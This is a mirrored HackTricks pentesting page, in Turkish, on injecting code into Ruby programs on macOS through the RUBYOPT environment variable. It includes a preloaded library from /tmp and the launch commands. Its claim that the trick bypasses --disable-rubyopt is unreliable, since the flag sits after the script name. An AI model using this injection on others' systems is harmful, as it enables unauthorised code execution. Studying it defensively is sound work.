Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 22:52:06 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md
Translator workflow 6cb783ece2 Translated to Turkish
2024-02-10 18:14:16 +00:00

3.3 KiB
Raw Blame History

macOS Ruby Uygulamaları Enjeksiyonu

AWS hacklemeyi sıfırdan kahraman olmak için htARTE (HackTricks AWS Kırmızı Takım Uzmanı) öğrenin!

HackTricks'i desteklemenin diğer yolları:

RUBYOPT

Bu çevre değişkeni kullanılarak ruby her çalıştırıldığında yeni parametreler eklemek mümkündür. -e parametresi ruby kodunu belirtmek için kullanılamasa da, -I ve -r parametreleri kullanılarak yüklenme yoluna yeni bir klasör eklemek ve ardından yüklenmesi gereken bir kütüphane belirtmek mümkündür.

/tmp dizininde inject.rb adında bir kütüphane oluşturun:

{% code title="inject.rb" %}

puts `whoami`

{% endcode %}

Herhangi bir yerde aşağıdaki gibi bir ruby betiği oluşturun:

{% code title="hello.rb" %}

puts 'Hello, World!'

{% endcode %}

Ardından, keyfi bir ruby betiği oluşturun ve aşağıdaki komutla yükleyin:

RUBYOPT="-I/tmp -rinject" ruby hello.rb

Eğlenceli bir gerçek, parametre --disable-rubyopt ile bile çalışır:

RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!

HackTricks'ı desteklemenin diğer yolları: